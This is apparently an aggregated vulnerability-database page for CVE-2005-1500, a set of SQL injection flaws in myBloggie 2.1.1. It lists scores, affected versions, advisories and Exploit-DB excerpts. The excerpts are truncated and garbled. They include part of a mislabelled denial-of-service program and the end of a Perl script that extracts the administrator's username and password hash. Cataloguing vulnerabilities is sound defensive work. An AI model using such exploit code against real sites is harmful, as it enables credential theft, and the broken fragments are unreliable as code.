CVE-2005-1500
Published 2005-05-11
Priority: P3 · 39 · high · 7.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.54% (83.0th percentile)
Multiple SQL injection vulnerabilities in myBloggie 2.1.1 allow remote attackers to execute arbitrary SQL commands via (1) the keyword parameter in search.php; or (2) the date_no parameter in viewdate mode, (3) the cat_id parameter in viewcat mode, the (4) month_no or (5) year parameter in viewmonth mode, or (6) post_id parameter in viewid mode to index.php. NOTE: item (1) was discovered to affect 2.1.3 as well.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mywebland | mybloggie | <= 2.1.6 | — |
| mywebland | mybloggie | — | — |
| mywebland | mybloggie | — | — |
GHSA
GHSA-76pf-qw9h-4mcg: Multiple SQL injection vulnerabilities in myBloggie 2
ghsa_unreviewed·2022-05-01
CVE-2005-1500 [HIGH] CWE-89 GHSA-76pf-qw9h-4mcg: Multiple SQL injection vulnerabilities in myBloggie 2
Multiple SQL injection vulnerabilities in myBloggie 2.1.1 allow remote attackers to execute arbitrary SQL commands via (1) the keyword parameter in search.php; or (2) the date_no parameter in viewdate mode, (3) the cat_id parameter in viewcat mode, the (4) month_no or (5) year parameter in viewmonth mode, or (6) post_id parameter in viewid mode to index.php. NOTE: item (1) was discovered to affect 2.1.3 as well.
GHSA
GHSA-x6m6-8vmr-89mp: Multiple SQL injection vulnerabilities in myBloggie 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3003 [HIGH] GHSA-x6m6-8vmr-89mp: Multiple SQL injection vulnerabilities in myBloggie 2
Multiple SQL injection vulnerabilities in myBloggie 2.1.6 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) cat_id or (2) year parameter to index.php in a viewuser action, different vectors than CVE-2005-1500 and CVE-2005-4225.
No detection rules found.
Exploit-DB
Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service
exploitdb·2005-08-10
CVE-2005-2577 Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service
---
// source: https://www.securityfocus.com/bid/14536/info
Winterm 1125SE is affected by a remote denial of service vulnerability. This issue is due to the application failing to handle exceptional conditions in a proper manner.
The problem occurs when processing packets with malformed IP headers. A successful attack causes the application to crash, denying service to legitimate users.
/*
* 3com superstack II RAS 1500 remote Denial of Service
*
* Piotr Chytla
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
*
* (c) 2003 Copyright by iSEC Security Research
*/
#include
#include
#include
#include
#define OPT_LEN 4
void usage()
{
printf("Args: \n");
printf("-s [source address]\n")
Exploit-DB
MyBloggie 2.1.1 < 2.1.2 - SQL Injection
exploitdb·2005-05-31
CVE-2005-1500 MyBloggie 2.1.1 < 2.1.2 - SQL Injection
MyBloggie 2.1.1 (.*?)/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1);
}
else {
$page=~m/ (.*?)/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1);
}
$page=~m/(.*?)/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
# milw0rm.com [2005-05-31]
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111531904608224&w=2
http://marc.info/?l=bugtraq&m=111722848308367&w=2
http://mywebland.com/forums/viewtopic.php?t=180
http://secunia.com/advisories/14980
http://www.securityfocus.com/bid/13507
http://www.securityfocus.com/bid/15017
https://exchange.xforce.ibmcloud.com/vulnerabilities/20439
2005-05-11
Published